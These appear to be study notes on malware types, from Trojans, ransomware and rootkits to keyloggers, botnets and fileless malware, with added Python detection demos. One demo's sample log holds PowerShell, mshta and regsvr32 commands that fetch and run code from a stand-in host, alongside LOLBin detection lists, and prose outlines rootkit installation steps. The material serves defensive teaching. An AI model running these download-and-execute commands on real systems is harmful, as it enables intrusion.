🦾 1 Understanding the Threat and Threat Sources
🦾 2 Understanding the Threat Actors/Agents
🦾 3 Understanding Various Threat Vectors
🦾 4 Overview of the Malware and the Common Techniques Attackers Use to Distribute Malware
🦾 5 Understanding the Different Types of Malware
🦾 6 Understanding the Vulnerability and Examples of Network Security Vulnerabilities
🦾 7 Overview of the Common Areas of Vulnerability
🦾 8 Understanding the Impact of Vulnerabilities
🦾 9 Understanding the Risk of Vulnerabilities
🦾 10 Understanding the Classification of Vulnerabilities
Threat Sources
Components of Malware
■ Crypter: Software that protects malware from reverse engineering or analysis, typically by encrypting the payload and decrypting it only at run time.
■ Downloader: A type of Trojan that downloads other malware from the Internet onto the PC.
■ Dropper: A type of Trojan that covertly installs other malware files onto the system.
■ Exploit: Malicious code that breaches system security via a software vulnerability to access information or install malware.
■ Injector: A program that injects its code into other vulnerable running processes and changes how they execute, in order to hide itself or prevent its removal.
■ Obfuscator: A program that conceals the malicious code of malware via various techniques, making it difficult for security mechanisms to detect or remove it.
■ Packer: A program that bundles all files together into a single compressed executable file to bypass detection by security software.
■ Payload: A piece of software that allows control over a computer system after it has been exploited.
■ Malicious Code: A command that defines malware's basic functionalities, such as stealing data and creating backdoors. Examples:
Java Applets
ActiveX Controls
Browser Plug-ins
Pushed Content
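Packers and crypters defeat signature matching by changing the bytes on disk, but the compressed or encrypted region they produce looks close to random, and that is what triage tooling keys on. The following is an added example (not code from the original notes) that measures Shannon entropy per byte and locates the high-entropy region inside a file; the sample "file" is constructed in the script (a plain-text stub followed by seeded pseudo-random bytes standing in for a packed or encrypted payload), the 7.0 bits/byte threshold is an assumed triage value, and no real binary is involved.

```python
import math
import random
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte: 0.0 for a constant run, close to 8.0 for random bytes."""
    if not data:
        return 0.0
    total = len(data)
    return -sum((c / total) * math.log2(c / total) for c in Counter(data).values())


def classify(data: bytes, threshold: float = 7.0) -> str:
    """Crude triage label: packed or encrypted content is nearly incompressible."""
    return "packed-or-encrypted" if shannon_entropy(data) >= threshold else "plain"


def high_entropy_windows(data: bytes, window: int = 1024, threshold: float = 7.0) -> list:
    """Offsets of non-overlapping windows whose entropy reaches the threshold.

    A packed executable usually keeps a small low-entropy unpacking stub next to
    the high-entropy payload, so the offsets show where the packed region starts.
    """
    return [
        off
        for off in range(0, len(data) - window + 1, window)
        if shannon_entropy(data[off:off + window]) >= threshold
    ]


# Constructed sample, not a real binary: a 1 KiB plain-text "stub" followed by
# 3 KiB of seeded pseudo-random bytes standing in for the packed/encrypted payload.
_rng = random.Random(1337)
TEXT_STUB = (b"The quick brown fox jumps over the lazy dog. " * 40)[:1024]
PACKED_BLOB = bytes(_rng.getrandbits(8) for _ in range(3072))
SAMPLE_FILE = TEXT_STUB + PACKED_BLOB


if __name__ == "__main__":
    print("stub :", round(shannon_entropy(TEXT_STUB), 2), classify(TEXT_STUB))
    print("blob :", round(shannon_entropy(PACKED_BLOB), 2), classify(PACKED_BLOB))
    print("high-entropy windows start at offsets:", high_entropy_windows(SAMPLE_FILE))
```

Entropy alone is a triage signal, not a verdict: legitimate installers, media files and signed compressed resources also score high, so the offsets are a pointer to the region worth unpacking or emulating, not proof of malware.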
Types of Malware
Malware is a piece of malicious software designed to perform activities intended by the attacker without the user's consent. It may take the form of executable code, active content, scripts, or other kinds of software.
Listed below are various types of malware:
Types of Trojans (1)
Indications of a Trojan Attack
The computer screen blinks, flips upside-down, or is inverted so that everything is displayed backward
The default background or wallpaper settings change automatically
Web pages suddenly open without input from the user
The color settings of the operating system (OS) change automatically
Antivirus programs are automatically disabled
Pop-ups with bizarre messages suddenly appear
Types of Trojans
Trojans are classified according to their functionality and targets. Some examples include:
1 Remote Access Trojans
2 Backdoor Trojans
3 Botnet Trojans
4 Rootkit Trojans
5 E-Banking Trojans
6 Point-of-Sale Trojans
7 Defacement Trojans
8 Service Protocol Trojans
9 Mobile Trojans
10 IoT Trojans
11 Security Software Disabler Trojans
12 Destructive Trojans
13 DDoS Attack Trojans
14 Command Shell Trojans
Creating Trojans
Some additional Trojan horse construction kits are listed on page 43 (sheet 58)
Trojan ports are listed on pages 37-52
Ransomware
A type of malware that restricts access to the computer system's files and folders
Demands an online ransom payment to the malware creator(s) to remove the restrictions
Example: Dharma
Types of Ransomware
Cerber
CryptorBit
CTB-Locker
CryptoLocker
Sodinokibi
CryptoDefense
BitPaymer
CryptoWall
eCh0raix
CryptXXX
Police-themed Ransomware
CryptghOst
MegaCortex
SamSam
LockerGoga
WannaCry
NamPoHyu
Petya/NotPetya
GandCrab
(page 65, sheet 79)
Worm (4)
What is a Worm
Malicious programs that independently replicate, execute, and spread across network connections
Consume available computing resources without human interaction
Attackers use worm payloads to install backdoors on infected computers
How Worms Work
Types of Worms
Attackers use worm payloads to install backdoors on infected computers, which turns them into zombies and creates a botnet. Attackers use these botnets to initiate cyber-attacks. Some of the latest computer worms are as follows:
🐛 Monero
🐛 Bondat
🐛 Beapy
Worm vs. Virus Comparison
Virus
A virus infects a system by inserting itself into a file or executable program
It might delete or alter the content of files or change the location of files in the system
It alters the way a computer system operates without the knowledge or consent of the user
A virus cannot spread to other computers unless an infected file is replicated and sent to the other computers
A virus spreads at a uniform rate, as programmed
Viruses are difficult to remove from infected machines
Worm
A worm infects a system by exploiting a vulnerability in an OS or application and replicating itself
Typically, a worm does not modify any stored programs; it only consumes CPU and memory
It consumes network bandwidth, system memory, etc. excessively, overloading servers and user computers
A worm can replicate itself and spread using IRC, Outlook, or other applicable mailing programs after installation in a system
A worm spreads more rapidly than a virus
Compared with a virus, a worm can be removed from a system more easily
Worm Makers
Rootkits (5)
What is a Rootkit
Rootkits are programs that hide their own presence as well as the attacker's malicious activities, granting the attacker full access to the server or host now and in the future
Rootkits replace certain operating system calls and utilities with their own modified versions of those routines, which undermine the security of the target system and cause malicious functions to be executed
A typical rootkit comprises backdoor programs, DDoS programs, packet sniffers, log-wiping utilities, IRC bots, etc.
⚓ The attacker places a rootkit by:
Scanning for vulnerable computers and servers on the web
Wrapping it in a special package, such as a game
Installing it on public or corporate computers through social engineering
Launching a zero-day attack (privilege escalation, buffer overflow, Windows kernel exploitation, etc.)
⚓ Objectives of a rootkit:
To root the host system and gain remote backdoor access
To mask the attacker's tracks and the presence of malicious applications or processes
To gather sensitive data, network traffic, etc. from a system to which the attacker might otherwise be restricted or have no access
To store other malicious programs on the system and act as a server resource for bot updates
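The mechanism above (a rootkit swapping a system routine for its own filtered copy) and the standard counter to it (cross-view detection: enumerate the same objects through two independent paths and diff the results) can both be shown in user space. The following is an added example, not code from the original notes: it hooks Python's `os.listdir` so that any file whose name starts with an assumed `rk_` prefix disappears from the API view, then detects the hidden file by comparing that view against `os.scandir`, a separate function object the hook does not touch. The temporary directory and file names are constructed for the demo; a real rootkit hunt would compare the hooked API against raw disk structures or a direct syscall rather than a second library call.

```python
import os
import tempfile

HIDDEN_PREFIX = "rk_"           # assumed naming convention for the attacker's files
_original_listdir = os.listdir  # keep the real routine so the hook can be removed


def _hooked_listdir(path="."):
    """Trojanised os.listdir: identical to the original except that it drops
    every entry the rootkit wants hidden (the analogue of a patched `ls` or a
    hooked directory-enumeration call)."""
    return [name for name in _original_listdir(path) if not name.startswith(HIDDEN_PREFIX)]


def install_hook():
    os.listdir = _hooked_listdir


def remove_hook():
    os.listdir = _original_listdir


def cross_view_scan(path):
    """Cross-view detection: enumerate the directory through two different code
    paths and report names present in the lower-level view but missing from
    the API view. os.scandir is a distinct function, so the hook on os.listdir
    cannot filter it."""
    api_view = set(os.listdir(path))
    raw_view = {entry.name for entry in os.scandir(path)}
    return raw_view - api_view


def demo():
    """Plant a benign file and a 'rootkit' file, hook the API, compare the views."""
    with tempfile.TemporaryDirectory() as workdir:
        for name in ("notes.txt", "rk_backdoor.so"):   # constructed sample files
            open(os.path.join(workdir, name), "w").close()
        install_hook()
        try:
            visible = sorted(os.listdir(workdir))       # what a hooked tool reports
            hidden = cross_view_scan(workdir)           # what the diff uncovers
        finally:
            remove_hook()                               # always restore the real routine
    return visible, hidden


if __name__ == "__main__":
    visible, hidden = demo()
    print("hooked listdir shows:", visible)
    print("cross-view flagged :", sorted(hidden))
```

The point of the diff is that a rootkit has to hook every path an observer might use; anything it misses becomes the reference view. Kernel-mode rootkits close this gap by hooking below the API, which is why production tools take the second view from offline disk images, memory dumps or hardware-rooted measurements.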
Commonly Used Rootkit Tools
How a UEFI firmware rootkit is installed:
1 Collect and save all the system settings in a text file
2 Read the contents of the system's Serial Peripheral Interface (SPI) flash memory, which holds the UEFI/BIOS, and save it as a firmware image
3 Embed a malicious UEFI module (the rootkit) into the firmware image, then write the modified image back to the SPI flash memory
How a dropper-delivered rootkit runs:
1 The dropper installs a rootkit on the system
2 The rootkit registers a shutdown callback to achieve persistence: at shutdown, the driver is written to disk and a start-up service key is created in the registry
3 The rootkit injects a downloader into an svchost.exe process
4 The downloader sends some information about the system to the C&C server and receives download links
5 Payloads are downloaded and executed automatically
Potentially Unwanted Applications (PUAs)
Also known as grayware or junkware, PUAs are potentially harmful applications that may pose severe risks to the security and privacy of data stored on the system where they are installed
Installed when downloading and installing freeware through a third-party installer, or when accepting a misleading license agreement
Covertly monitor and alter data or settings on the system, similarly to other malware
Types of PUAs
■ Adware: These PUAs display unsolicited advertisements offering free sales and pop-ups of online services when browsing websites. They may disturb normal activities and lure victims into clicking on malicious URLs. They may also issue bogus reminders about outdated software or OS versions.
■ Torrent: When using torrent applications to download large files, the user may be compelled to download unwanted programs that have peer-to-peer file-sharing features.
■ Marketing: Marketing PUAs monitor the online activities performed by users and send browser details and information about personal interests to third-party app owners. These applications then market products and resources based on the users' personal interests.
■ Cryptomining: Cryptomining PUAs abuse the victim's computing resources, and any personal or financial data on the system, to mine cryptocurrencies such as Bitcoin.
■ Dialers: Dialers or spyware dialers are programs that are installed and configured on a system automatically to call a set of numbers at several locations without the user's consent. Dialers cause massive telephone bills and are sometimes very difficult to locate and delete.
Keyloggers
Keystroke loggers are programs or hardware devices that monitor each keystroke as the user types on a keyboard, log the keystrokes to a file, or transmit them to a remote location
They allow the attacker to gather confidential information about the victim such as email IDs, passwords, banking details, chat room activity, IRC, and instant messages
What a keylogger can do
Record every keystroke typed on the user's keyboard
Capture screenshots at regular intervals, showing user activity such as typed characters
Track the activities of users by logging Window titles, names of launched applications, etc.
Monitor the online activity of users by recording addresses of the websites visited
Record all login names, bank and credit card numbers, and passwords
Botnets
A botnet is a collection of compromised computers connected to the Internet to perform a distributed task
Attackers distribute malicious software that turns a user's computer into a bot
"Bot" refers to a program or an infected system that performs repetitive work, or acts as an agent or user interface to control other programs
Why do attackers use botnets?
Perform DDoS attacks, which consume the bandwidth of the victim's computers
Use a sniffer to steal information from one botnet and use it against another botnet
Perform keylogging to harvest account login information for services
Use to spread new bots
Perpetrate a "click fraud" by automating clicks
Perform mass identity theft
Attackers use botnets for:
DDoS attacks
Spamming
Sniffing traffic
Keylogging
Spreading new malware
Installing advertisement add-ons
Google AdSense abuse
Attacks on IRC chat networks
Manipulating online polls and games
Mass identity theft
(page 113, sheet 98)
Fileless Malware (10)
Overview
Fileless malware, also known as non-malware, abuses legitimate software, applications, and protocols already present on the system to perform various malicious activities
Leverages any existing vulnerabilities to infect the system
Resides in the system's RAM rather than on disk
Injects malicious code into running processes such as Microsoft Word, Flash, Adobe PDF Reader, JavaScript, and PowerShell
Why attackers use fileless malware
Stealth: Fileless malware abuses legitimate system tools, so fileless attacks are extremely difficult to detect, block, or prevent with file-based scanning
Living off the land ("LOL"): The system tools abused by fileless malware are already installed on the system by default, so the attacker does not need to create and install custom tools on the target
Trustworthy: The system tools used by fileless malware are the most frequently used and trusted tools, so security tools incorrectly assume they are running for a legitimate purpose
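Because nothing malicious is written to disk, the detection surface for living-off-the-land attacks is the process tree and the command line, not the file. The following is an added example, not code from the original notes: it runs a few detection checks over constructed process-creation log lines (the pipe-separated `timestamp|Image|ParentImage|CommandLine` layout, the hosts and URLs, and the `-EncodedCommand` payload are all made up for the demo and are not from any real product or incident). It decodes the base64/UTF-16LE blob PowerShell accepts after `-enc`, looks for download-and-execute tokens in the visible and decoded script, flags well-known LOLBins, and flags an Office application spawning a script host, which is how the "inject into Microsoft Word" chain usually shows up in telemetry.

```python
import base64
import re

# Constructed log format for the demo (not a real product's schema):
#   timestamp|Image|ParentImage|CommandLine
_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
_B64 = base64.b64encode(_PAYLOAD.encode("utf-16le")).decode("ascii")  # what -enc expects

SAMPLE_LOG = [
    "2024-03-01T09:10:02Z|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|C:\\Windows\\explorer.exe|powershell.exe -File C:\\scripts\\backup.ps1",
    f"2024-03-01T09:12:44Z|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|C:\\Windows\\System32\\cmd.exe|powershell.exe -nop -w hidden -enc {_B64}",
    "2024-03-01T09:13:01Z|C:\\Windows\\System32\\mshta.exe|C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE|mshta.exe http://example.invalid/x.hta",
    "2024-03-01T09:15:30Z|C:\\Windows\\System32\\regsvr32.exe|C:\\Windows\\System32\\cmd.exe|regsvr32.exe /s /n /u /i:http://example.invalid/f.sct scrobj.dll",
]

LOLBINS = {"mshta.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe", "wmic.exe", "msbuild.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SUSPICIOUS_TOKENS = ("iex", "invoke-expression", "downloadstring", "downloadfile",
                     "invoke-webrequest", "frombase64string", "-nop", "-noprofile",
                     "hidden", "bypass")

# -e / -ec / -enc / -EncodedCommand followed by a base64 blob
ENC_RE = re.compile(r"(?i)-e(?:ncodedcommand|nc|c)?\s+([A-Za-z0-9+/=]{16,})")


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """PowerShell -EncodedCommand carries UTF-16LE text in base64; return it or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a valid encoded command after all


def analyze(line: str) -> dict:
    """Run the detection checks over one log line and return the findings."""
    timestamp, image, parent, cmdline = line.split("|", 3)
    img, par = basename(image), basename(parent)
    findings = []

    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded-command")

    # Inspect the visible command line (blob replaced) plus the decoded script.
    text = ENC_RE.sub("-enc <blob>", cmdline).lower() + " " + (decoded or "").lower()
    hits = [t for t in SUSPICIOUS_TOKENS if t in text]
    if hits:
        findings.append("suspicious-tokens")
    if img in LOLBINS:
        findings.append("lolbin:" + img)
    if par in OFFICE_APPS and img in SCRIPT_HOSTS:
        findings.append("office-spawned-script-host")

    return {"timestamp": timestamp, "image": img, "parent": par,
            "decoded": decoded, "hits": hits, "findings": findings}


def scan(lines=SAMPLE_LOG) -> list:
    """Return only the records that produced at least one finding."""
    return [r for r in map(analyze, lines) if r["findings"]]


if __name__ == "__main__":
    for r in scan():
        print(r["timestamp"], r["image"], r["findings"], r["hits"])
```

Two practical caveats: the token list is deliberately short and will need tuning against your own baseline (administrative scripts legitimately use `-nop` and `Invoke-WebRequest`), and none of this fires unless command-line capture and PowerShell script-block logging are actually enabled on the endpoints, which is the first thing to verify before relying on such rules.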